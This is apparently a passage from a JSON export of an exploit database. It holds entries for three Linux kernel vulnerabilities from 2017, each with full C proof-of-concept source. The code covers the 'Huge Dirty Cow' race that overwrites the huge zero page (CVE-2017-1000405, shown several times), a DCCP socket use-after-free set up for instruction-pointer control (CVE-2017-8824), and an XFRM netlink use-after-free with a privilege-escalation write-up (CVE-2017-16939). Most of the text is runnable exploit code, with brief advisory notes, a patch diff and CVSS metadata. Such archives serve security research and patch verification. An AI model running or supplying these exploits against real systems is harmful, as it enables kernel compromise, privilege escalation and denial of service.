https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0\n// EDB Note: Source ~ https://github.com/bindecy/HugeDirtyCowPOC\n// Author Note: Before running, make sure to set transparent huge pages to \"always\": \n// `echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled`\n//\n\n//\n// The Huge Dirty Cow POC. This program overwrites the system's huge zero page.\n// Compile with \"gcc -pthread main.c\"\n//\n// November 2017\n// Bindecy\n//\n\n#define _GNU_SOURCE\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <fcntl.h> \n#include <unistd.h> \n#include <sched.h>\n#include <string.h>\n#include <pthread.h>\n#include <sys/mman.h>\n#include <sys/types.h>\n#include <sys/wait.h> \n\n#define MAP_BASE ((void *)0x4000000)\n#define MAP_SIZE (0x200000)\n#define MEMESET_VAL (0x41)\n#define PAGE_SIZE (0x1000)\n#define TRIES_PER_PAGE (20000000)\n\nstruct thread_args {\n char *thp_map;\n char *thp_chk_map;\n off_t off;\n char *buf_to_write;\n int stop;\n int mem_fd1;\n int mem_fd2;\n};\n\ntypedef void * (*pthread_proc)(void *);\n\nvoid *unmap_and_read_thread(struct thread_args *args) {\n char c;\n int i;\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { \n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.\n \n memcpy(&c, args->thp_map + args->off, sizeof(c));\n read(args->mem_fd2, &c, sizeof(c));\n \n lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);\n usleep(10); // We placed the zero page and marked its PMD as dirty. \n // Give get_user_pages() another chance before madvise()-ing again.\n }\n \n return NULL;\n}\n\nvoid *write_thread(struct thread_args *args) {\n int i;\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {\n lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.\n write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);\n }\n \n return NULL;\n}\n\nvoid *wait_for_success(struct thread_args *args) {\n while (args->thp_chk_map[args->off] != MEMESET_VAL) {\n madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);\n sched_yield();\n }\n\n args->stop = 1;\n return NULL;\n}\n\nint main() {\n struct thread_args args;\n void *thp_chk_map_addr;\n int ret;\n\n // Mapping base should be a multiple of the THP size, so we can work with the whole huge page.\n args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\n if (args.thp_map == MAP_FAILED) {\n perror(\"[!] mmap()\");\n return -1;\n }\n if (args.thp_map != MAP_BASE) {\n fprintf(stderr, \"[!] Didn't get desired base address for the vulnerable mapping.\\n\");\n goto err_unmap1;\n }\n \n printf(\"[*] The beginning of the zero huge page: %lx\\n\", *(unsigned long *)args.thp_map);\n\n thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge\n args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \n if (args.thp_chk_map == MAP_FAILED) {\n perror(\"[!] mmap()\");\n goto err_unmap1;\n }\n if (args.thp_chk_map != thp_chk_map_addr) {\n fprintf(stderr, \"[!] Didn't get desired base address for the check mapping.\\n\");\n goto err_unmap2;\n }\n \n ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); \n ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);\n if (ret) {\n perror(\"[!] madvise()\");\n goto err_unmap2;\n }\n\n args.buf_to_write = malloc(PAGE_SIZE);\n if (!args.buf_to_write) {\n perror(\"[!] malloc()\");\n goto err_unmap2;\n }\n memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);\n \n args.mem_fd1 = open(\"/proc/self/mem\", O_RDWR);\n if (args.mem_fd1 < 0) {\n perror(\"[!] open()\");\n goto err_free;\n }\n \n args.mem_fd2 = open(\"/proc/self/mem\", O_RDWR);\n if (args.mem_fd2 < 0) {\n perror(\"[!] open()\");\n goto err_close1;\n }\n\n printf(\"[*] Racing. Gonna take a while...\\n\");\n args.off = 0;\n\n // Overwrite every single page\n while (args.off < MAP_SIZE) { \n pthread_t threads[3]; \n args.stop = 0;\n \n ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);\n ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);\n ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);\n \n if (ret) {\n perror(\"[!] pthread_create()\");\n goto err_close2;\n }\n \n pthread_join(threads[0], NULL); // This call will return only after the overwriting is done\n pthread_join(threads[1], NULL);\n pthread_join(threads[2], NULL);\n\n args.off += PAGE_SIZE; \n printf(\"[*] Done 0x%lx bytes\\n\", args.off);\n }\n \n printf(\"[*] Success!\\n\");\n \nerr_close2:\n close(args.mem_fd2);\nerr_close1:\n close(args.mem_fd1);\nerr_free:\n free(args.buf_to_write);\nerr_unmap2:\n munmap(args.thp_chk_map, MAP_SIZE);\nerr_unmap1:\n munmap(args.thp_map, MAP_SIZE);\n \n if (ret) {\n fprintf(stderr, \"[!] Exploit failed.\\n\");\n }\n \n return ret;\n}", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 4.10.5 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free", "edition": 1, "published": "2017-12-07T00:00:00", "title": "Linux Kernel 4.10.5 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8824"], "modified": "2017-12-07T00:00:00", "id": "EXPLOITPACK:21E02FD686B4E07E01D154BAF895DE82", "href": "", "sourceData": "/*\nThis is an announcement for CVE-2017-8824 which is a use-after-free\nvulnerability\n\nI found in Linux DCCP socket. It can be used to gain kernel code execution\nfrom unprivileged processes.\n\n\n\nYou\u2019ll find in attachment the proof of concept code and the kernel panic\nlog.\n\n\n\n####### BUG DETAILS ############\n\n\n\nWhen a socket sock object is in DCCP_LISTEN state and connect() system\ncall is being called with AF_UNSPEC,\n\nthe dccp_disconnect() puts sock state into DCCP_CLOSED, and forgets to free\ndccps_hc_rx_ccid/dccps_hc_tx_ccid and assigns NULL to them,\n\nthen when we call connect() again with AF_INET6 sockaddr family, the sock\nobject gets cloned via dccp_create_openreq_child() and returns a new sock\nobject,\n\nwhich holds references of dccps_hc_rx_ccid and dccps_hc_tx_ccid of the old\nsock object, and this leads to both the old and new sock objects can use\nthe same memory.\n\n\n\n####### LINKS ############\n\n\n\nhttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-8824\n\nhttp://lists.openwall.net/netdev/2017/12/04/224\n\n\n\n####### CREDITS ############\n\n\n\nMohamed Ghannam\n*/\n\n/*This poc has been tested on my custom kernel reseach in ubuntu 4.10.5, the same thing applies to other versions\n * if you don't see RIP control, that means file_security_alloc is not called, so we should look for other similar object\n * */\n#define _GNU_SOURCE\n#include <stdio.h>\n#include <string.h>\n#include <stdlib.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n#include <sys/syscall.h>\n#include <netinet/in.h>\n#include <unistd.h>\n#include <pthread.h>\n#include <sys/mman.h>\n\n\nint fd1,fd2;\nstruct sockaddr_in6 in1,in2;\n\nint do_uaf()\n{\n struct sockaddr_in6 cin1,cin2;\n\n fd1 = socket(0xa,6,0);\n\n memset(&in1,0,sizeof(in1));\n in1.sin6_family = AF_INET6;\n in1.sin6_addr = in6addr_loopback;\n in1.sin6_port = 0x214e;//htons(0x1000);\n bind(fd1,(struct sockaddr*)&in1,sizeof(in1));\n\n listen(fd1,0x1);\n\n fd2 = socket(0xa,6,0);\n\n memset(&cin1,0,sizeof(cin1));\n cin1.sin6_family = AF_INET6;\n cin1.sin6_addr = in6addr_loopback;\n cin1.sin6_port = 0x214e;//htons(0x1000);\n cin1.sin6_flowinfo = 0;\n connect(fd2,(struct sockaddr*)&cin1,sizeof(cin1));\n\n memset(&cin2,0,sizeof(cin2));\n connect(fd1,(struct sockaddr*)&cin2,sizeof(cin2));\n memset(&in2,0,sizeof(in2));\n\n in2.sin6_family = AF_INET6;\n in2.sin6_addr = in6addr_loopback;\n in2.sin6_port = htons(0x2000);\n in2.sin6_flowinfo = 0x2;\n in2.sin6_scope_id = 6;\n bind(fd2,(struct sockaddr*)&in2,sizeof(in2));\n\n struct sockaddr_in6 cin3;\n memset(&cin3,0,sizeof(cin3));\n connect(fd2,(struct sockaddr*)&cin3,sizeof(cin3));\n\n listen(fd2,0xb1);\n\n struct sockaddr_in6 cin4;\n memset(&cin4,0,sizeof(cin4));\n cin4.sin6_family = AF_INET6;\n cin4.sin6_port = htons(0x2000);//htons(0x3000);\n memset(&cin4.sin6_addr,0,sizeof(struct in6_addr));\n cin4.sin6_flowinfo = 1;\n cin4.sin6_scope_id = 0x32f1;\n connect(fd1,(struct sockaddr*)&cin4,sizeof(cin4));\n return fd2;\n}\n\nvoid * alloc_umem(void *addr,size_t size)\n{\n\n addr = mmap((void*)0x100000000,4096,PROT_READ | PROT_WRITE | PROT_EXEC,MAP_SHARED|MAP_ANONYMOUS,-1,0);\n if(addr == (char *)-1) {\n perror(\"mmap\");\n return NULL;\n }\n return addr;\n}\nint main(void)\n{\n char *addr;\n\n addr = (char *)alloc_umem((void*)0x100000000,4096);\n if(addr == NULL)\n exit(0);\n memset(addr,0xcc,4096);\n *(unsigned long *)(addr + 0x79) = 0xdeadbeef; /* RIP control */\n\n do_uaf();\n socket(AF_INET,SOCK_STREAM,0);\n close(fd2);\n return 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:26", "description": "\nLinux Kernel (Ubuntu 17.04) - XFRM Local Privilege Escalation", "edition": 1, "published": "2017-11-23T00:00:00", "title": "Linux Kernel (Ubuntu 17.04) - XFRM Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16939"], "modified": "2017-11-23T00:00:00", "id": "EXPLOITPACK:F867C230BBE8FA4BCFE72E04CBAC881F", "href": "", "sourceData": "## Vulnerability Summary\nThe following advisory describes a Use-after-free vulnerability found in Linux kernel that can lead to privilege escalation. The vulnerability found in Netlink socket subsystem \u2013 XFRM.\n\nNetlink is used to transfer information between the kernel and user-space processes. It consists of a standard sockets-based interface for user space processes and an internal kernel API for kernel modules.\n\n## Credit\nAn independent security researcher, Mohamed Ghannam, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program\n\n## Vendor response\nThe vulnerability has been addressed as part of 1137b5e (\u201cipsec: Fix aborted xfrm policy dump crash\u201d) patch: CVE-2017-16939\n\n```\n @@ -1693,32 +1693,34 @@ static int dump_one_policy(struct xfrm_policy *xp, int dir, int count, void *ptr\n\n static int xfrm_dump_policy_done(struct netlink_callback *cb)\n {\n- struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &cb->args[1];\n+ struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args;\n struct net *net = sock_net(cb->skb->sk);\n \n xfrm_policy_walk_done(walk, net);\n return 0;\n }\n \n+static int xfrm_dump_policy_start(struct netlink_callback *cb)\n+{\n+ struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args;\n+\n+ BUILD_BUG_ON(sizeof(*walk) > sizeof(cb->args));\n+\n+ xfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY);\n+ return 0;\n+}\n+\n static int xfrm_dump_policy(struct sk_buff *skb, struct netlink_callback *cb)\n {\n struct net *net = sock_net(skb->sk);\n- struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &cb->args[1];\n+ struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args;\n struct xfrm_dump_info info;\n \n- BUILD_BUG_ON(sizeof(struct xfrm_policy_walk) >\n- sizeof(cb->args) - sizeof(cb->args[0]));\n-\n info.in_skb = cb->skb;\n info.out_skb = skb;\n info.nlmsg_seq = cb->nlh->nlmsg_seq;\n info.nlmsg_flags = NLM_F_MULTI;\n \n- if (!cb->args[0]) {\n- cb->args[0] = 1;\n- xfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY);\n- }\n-\n (void) xfrm_policy_walk(net, walk, dump_one_policy, &info);\n \n return skb->len;\n @@ -2474,6 +2476,7 @@ static const struct nla_policy xfrma_spd_policy[XFRMA_SPD_MAX+1] = {\n \n static const struct xfrm_link {\n int (*doit)(struct sk_buff *, struct nlmsghdr *, struct nlattr **);\n+ int (*start)(struct netlink_callback *);\n int (*dump)(struct sk_buff *, struct netlink_callback *);\n int (*done)(struct netlink_callback *);\n const struct nla_policy *nla_pol;\n @@ -2487,6 +2490,7 @@ static const struct xfrm_link {\n [XFRM_MSG_NEWPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_add_policy },\n [XFRM_MSG_DELPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_get_policy },\n [XFRM_MSG_GETPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_get_policy,\n+ .start = xfrm_dump_policy_start,\n .dump = xfrm_dump_policy,\n .done = xfrm_dump_policy_done },\n [XFRM_MSG_ALLOCSPI - XFRM_MSG_BASE] = { .doit = xfrm_alloc_userspi },\n @@ -2539,6 +2543,7 @@ static int xfrm_user_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh,\n \n {\n struct netlink_dump_control c = {\n+ .start = link->start,\n .dump = link->dump,\n .done = link->done,\n };\n```\n\n## Vulnerability details\nAn unprivileged user can change Netlink socket subsystem \u2013 XFRM value sk->sk_rcvbuf (sk == struct sock object).\n\nThe value can be changed into specific range via setsockopt(SO_RCVBUF). sk_rcvbuf is the total number of bytes of a buffer receiving data via recvmsg/recv/read.\n\nThe sk_rcvbuf value is how many bytes the kernel should allocate for the skb (struct sk_buff objects).\n\nskb->trusize is a variable which keep track of how many bytes of memory are consumed, in order to not wasting and manage memory, the kernel can handle the skb size at run time.\n\nFor example, if we allocate a large socket buffer (skb) and we only received 1-byte packet size, the kernel will adjust this by calling skb_set_owner_r.\n\nBy calling skb_set_owner_r the sk->sk_rmem_alloc (refers to an atomic variable sk->sk_backlog.rmem_alloc) is modified.\n\n\n\nWhen we create a XFRM netlink socket, xfrm_dump_policy is called, when we close the socket xfrm_dump_policy_done is called.\n\nxfrm_dump_policy_done is called whenever cb_running for netlink_sock object is true.\n\nThe xfrm_dump_policy_done tries to clean-up a xfrm walk entry which is managed by netlink_callback object.\n\n\n\nWhen netlink_skb_set_owner_r is called (like skb_set_owner_r) it updates the sk_rmem_alloc.\n\nnetlink_dump():\n\n\nIn above snippet we can see that netlink_dump() check fails when sk->sk_rcvbuf is smaller than sk_rmem_alloc (notice that we can control sk->sk_rcvbuf via stockpot).\n\nWhen this condition fails, it jumps to the end of a function and quit with failure and the value of cb_running doesn\u2019t changed to false.\n\nnlk->cb_running is true, thus xfrm_dump_policy_done() is being called.\n\n\n\nnlk->cb.done points to xfrm_dump_policy_done, it worth noting that this function handles a doubly linked list, so if we can tweak this vulnerability to reference a controlled buffer, we could have a read/write what/where primitive.\n\n## Proof of Concept\n\nThe following proof of concept is for Ubuntu 17.04.\n\n```\n#define _GNU_SOURCE\n#include <string.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <asm/types.h>\n#include <sys/socket.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n#include <linux/netlink.h>\n#include <linux/xfrm.h>\n#include <sched.h>\n#include <unistd.h>\n\n#define BUFSIZE 2048\n\n\nint fd;\nstruct sockaddr_nl addr;\n\nstruct msg_policy {\n struct nlmsghdr msg;\n char buf[BUFSIZE];\n};\n\nvoid create_nl_socket(void)\n{\n fd = socket(PF_NETLINK,SOCK_RAW,NETLINK_XFRM);\n memset(&addr,0,sizeof(struct sockaddr_nl));\n addr.nl_family = AF_NETLINK;\n addr.nl_pid = 0; /* packet goes into the kernel */\n addr.nl_groups = XFRMNLGRP_NONE; /* no need for multicast group */\n\n}\n\nvoid do_setsockopt(void)\n{\n int var =0x100;\n\n setsockopt(fd,1,SO_RCVBUF,&var,sizeof(int));\n}\n\nstruct msg_policy *init_policy_dump(int size)\n{\n struct msg_policy *r;\n\n r = malloc(sizeof(struct msg_policy));\n if(r == NULL) {\n perror(\"malloc\");\n exit(-1);\n }\n memset(r,0,sizeof(struct msg_policy));\n\n r->msg.nlmsg_len = 0x10;\n r->msg.nlmsg_type = XFRM_MSG_GETPOLICY;\n r->msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI | NLM_F_REQUEST;\n r->msg.nlmsg_seq = 0x1;\n r->msg.nlmsg_pid = 2;\n return r;\n\n}\nint send_msg(int fd,struct nlmsghdr *msg)\n{\n int err;\n err = sendto(fd,(void *)msg,msg->nlmsg_len,0,(struct sockaddr*)&addr,sizeof(struct sockaddr_nl));\n if (err < 0) {\n perror(\"sendto\");\n return -1;\n }\n return 0;\n\n}\n\nvoid create_ns(void)\n{\n if(unshare(CLONE_NEWUSER) != 0) {\n perror(\"unshare(CLONE_NEWUSER)\");\n exit(1);\n }\n if(unshare(CLONE_NEWNET) != 0) {\n perror(\"unshared(CLONE_NEWUSER)\");\n exit(2);\n }\n}\nint main(int argc,char **argv)\n{\n struct msg_policy *p;\n create_ns();\n\n create_nl_socket();\n p = init_policy_dump(100);\n do_setsockopt();\n send_msg(fd,&p->msg);\n p = init_policy_dump(1000);\n send_msg(fd,&p->msg);\n return 0;\n}\n```", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2017-12-01T13:01:22", "description": "Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page. CVE-2017-1000405. Dos exploit for Linux platform", "published": "2017-11-30T00:00:00", "type": "exploitdb", "title": "Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000405"], "modified": "2017-11-30T00:00:00", "id": "EDB-ID:43199", "href": "https://www.exploit-db.com/exploits/43199/", "sourceData": "// EDB Note: Source ~ https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0\r\n// EDB Note: Source ~ https://github.com/bindecy/HugeDirtyCowPOC\r\n// Author Note: Before running, make sure to set transparent huge pages to \"always\": \r\n// `echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled`\r\n//\r\n\r\n//\r\n// The Huge Dirty Cow POC. This program overwrites the system's huge zero page.\r\n// Compile with \"gcc -pthread main.c\"\r\n//\r\n// November 2017\r\n// Bindecy\r\n//\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h> \r\n#include <unistd.h> \r\n#include <sched.h>\r\n#include <string.h>\r\n#include <pthread.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h> \r\n\r\n#define MAP_BASE ((void *)0x4000000)\r\n#define MAP_SIZE (0x200000)\r\n#define MEMESET_VAL (0x41)\r\n#define PAGE_SIZE (0x1000)\r\n#define TRIES_PER_PAGE (20000000)\r\n\r\nstruct thread_args {\r\n char *thp_map;\r\n char *thp_chk_map;\r\n off_t off;\r\n char *buf_to_write;\r\n int stop;\r\n int mem_fd1;\r\n int mem_fd2;\r\n};\r\n\r\ntypedef void * (*pthread_proc)(void *);\r\n\r\nvoid *unmap_and_read_thread(struct thread_args *args) {\r\n char c;\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { \r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.\r\n \r\n memcpy(&c, args->thp_map + args->off, sizeof(c));\r\n read(args->mem_fd2, &c, sizeof(c));\r\n \r\n lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n usleep(10); // We placed the zero page and marked its PMD as dirty. \r\n // Give get_user_pages() another chance before madvise()-ing again.\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *write_thread(struct thread_args *args) {\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {\r\n lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.\r\n write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *wait_for_success(struct thread_args *args) {\r\n while (args->thp_chk_map[args->off] != MEMESET_VAL) {\r\n madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);\r\n sched_yield();\r\n }\r\n\r\n args->stop = 1;\r\n return NULL;\r\n}\r\n\r\nint main() {\r\n struct thread_args args;\r\n void *thp_chk_map_addr;\r\n int ret;\r\n\r\n // Mapping base should be a multiple of the THP size, so we can work with the whole huge page.\r\n args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n if (args.thp_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n return -1;\r\n }\r\n if (args.thp_map != MAP_BASE) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the vulnerable mapping.\\n\");\r\n goto err_unmap1;\r\n }\r\n \r\n printf(\"[*] The beginning of the zero huge page: %lx\\n\", *(unsigned long *)args.thp_map);\r\n\r\n thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge\r\n args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \r\n if (args.thp_chk_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n goto err_unmap1;\r\n }\r\n if (args.thp_chk_map != thp_chk_map_addr) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the check mapping.\\n\");\r\n goto err_unmap2;\r\n }\r\n \r\n ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); \r\n ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);\r\n if (ret) {\r\n perror(\"[!] madvise()\");\r\n goto err_unmap2;\r\n }\r\n\r\n args.buf_to_write = malloc(PAGE_SIZE);\r\n if (!args.buf_to_write) {\r\n perror(\"[!] malloc()\");\r\n goto err_unmap2;\r\n }\r\n memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);\r\n \r\n args.mem_fd1 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd1 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_free;\r\n }\r\n \r\n args.mem_fd2 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd2 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_close1;\r\n }\r\n\r\n printf(\"[*] Racing. Gonna take a while...\\n\");\r\n args.off = 0;\r\n\r\n // Overwrite every single page\r\n while (args.off < MAP_SIZE) { \r\n pthread_t threads[3]; \r\n args.stop = 0;\r\n \r\n ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);\r\n ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);\r\n ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);\r\n \r\n if (ret) {\r\n perror(\"[!] pthread_create()\");\r\n goto err_close2;\r\n }\r\n \r\n pthread_join(threads[0], NULL); // This call will return only after the overwriting is done\r\n pthread_join(threads[1], NULL);\r\n pthread_join(threads[2], NULL);\r\n\r\n args.off += PAGE_SIZE; \r\n printf(\"[*] Done 0x%lx bytes\\n\", args.off);\r\n }\r\n \r\n printf(\"[*] Success!\\n\");\r\n \r\nerr_close2:\r\n close(args.mem_fd2);\r\nerr_close1:\r\n close(args.mem_fd1);\r\nerr_free:\r\n free(args.buf_to_write);\r\nerr_unmap2:\r\n munmap(args.thp_chk_map, MAP_SIZE);\r\nerr_unmap1:\r\n munmap(args.thp_map, MAP_SIZE);\r\n \r\n if (ret) {\r\n fprintf(stderr, \"[!] Exploit failed.\\n\");\r\n }\r\n \r\n return ret;\r\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43199/"}, {"lastseen": "2018-05-24T14:08:25", "description": "Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2). CVE-2017-1000405. Dos exploit for Linux platform", "published": "2017-12-11T00:00:00", "type": "exploitdb", "title": "Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000405"], "modified": "2017-12-11T00:00:00", "id": "EDB-ID:44305", "href": "https://www.exploit-db.com/exploits/44305/", "sourceData": "/*\r\n * The code is modified from https://www.exploit-db.com/exploits/43199/\r\n */\r\n#define _GNU_SOURCE\r\n#include <unistd.h>\r\n#include <sys/mman.h>\r\n#include <err.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h>\r\n#include <sys/stat.h>\r\n#include <sched.h>\r\n#include <pthread.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n\r\n#define TRIES_PER_PAGE (20000000)\r\n#define PAGE_SIZE (0x1000)\r\n#define MEMESET_VAL (0x41)\r\n#define MAP_SIZE (0x200000)\r\n#define STRING \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n#define OFFSIZE ((sizeof(STRING)-1)/sizeof(char))\r\n\r\nstruct args{\r\n int fd;\r\n void *p;\r\n int stop;\r\n off_t off;\r\n char *chp;\r\n};\r\n\r\nvoid *write_thread(struct args *arg) {\r\n for (int i = 0; i < TRIES_PER_PAGE && !arg->stop; i++) {\r\n lseek(arg->fd, (off_t)(arg->chp + arg->off*OFFSIZE), SEEK_SET);\r\n write(arg->fd, STRING, sizeof(STRING));\r\n lseek(arg->fd, (off_t)(arg->chp + arg->off*OFFSIZE), SEEK_SET);\r\n }\r\n return NULL;\r\n}\r\n\r\nvoid *wait_for_success(struct args *arg) {\r\n while(*(arg->chp+arg->off*OFFSIZE) != 'A') {\r\n int i = madvise(arg->p, MAP_SIZE, MADV_DONTNEED);\r\n sched_yield();\r\n }\r\n arg->stop = 1;\r\n return NULL;\r\n}\r\n\r\nint main(void) {\r\n struct args arg;\r\n\r\n arg.off = 0;\r\n \r\n arg.p = mmap((void*)0x40000000, MAP_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);\r\n \r\n if(arg.p == MAP_FAILED)\r\n perror(\"[!] mmap()\");\r\n arg.chp = arg.p;\r\n printf(\"mmap address is %p\\n\", arg.p);\r\n madvise(arg.p, MAP_SIZE, MADV_HUGEPAGE);\r\n\r\n arg.fd = open(\"/proc/self/mem\", O_RDWR);\r\n if (arg.fd < 0) {\r\n perror(\"[!] open()\");\r\n return 1;\r\n }\r\n \r\n \r\n while(arg.off < PAGE_SIZE/sizeof(STRING)) {\r\n arg.stop = 0;\r\n pthread_t thread0, thread1;\r\n int ret = pthread_create(&thread0, NULL, (void *)wait_for_success, &arg);\r\n ret |= pthread_create(&thread1, NULL, (void *)write_thread, &arg);\r\n \r\n if (ret) {\r\n perror(\"[!] pthread_create()\");\r\n return 1;\r\n }\r\n \r\n pthread_join(thread0, NULL);\r\n pthread_join(thread1, NULL); \r\n \r\n printf(\"[*] Done 0x%x String\\n\", arg.off);\r\n arg.off++;\r\n }\r\n printf(\"[*] Overwrite a page\\n\");\r\n printf(\"%s\\n\", arg.p);\r\n return 0;\r\n}", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44305/"}, {"lastseen": "2017-12-08T17:44:27", "description": "Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free. CVE-2017-8824. Dos exploit for Linux platform. Tags: Denial of Service (DoS)", "published": "2017-12-07T00:00:00", "type": "exploitdb", "title": "Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8824"], "modified": "2017-12-07T00:00:00", "id": "EDB-ID:43234", "href": "https://www.exploit-db.com/exploits/43234/", "sourceData": "/*\r\nThis is an announcement for CVE-2017-8824 which is a use-after-free\r\nvulnerability\r\n\r\nI found in Linux DCCP socket. It can be used to gain kernel code execution\r\nfrom unprivileged processes.\r\n\r\n\r\n\r\nYou\u00e2\u20ac\u2122ll find in attachment the proof of concept code and the kernel panic\r\nlog.\r\n\r\n\r\n\r\n####### BUG DETAILS ############\r\n\r\n\r\n\r\nWhen a socket sock object is in DCCP_LISTEN state and connect() system\r\ncall is being called with AF_UNSPEC,\r\n\r\nthe dccp_disconnect() puts sock state into DCCP_CLOSED, and forgets to free\r\ndccps_hc_rx_ccid/dccps_hc_tx_ccid and assigns NULL to them,\r\n\r\nthen when we call connect() again with AF_INET6 sockaddr family, the sock\r\nobject gets cloned via dccp_create_openreq_child() and returns a new sock\r\nobject,\r\n\r\nwhich holds references of dccps_hc_rx_ccid and dccps_hc_tx_ccid of the old\r\nsock object, and this leads to both the 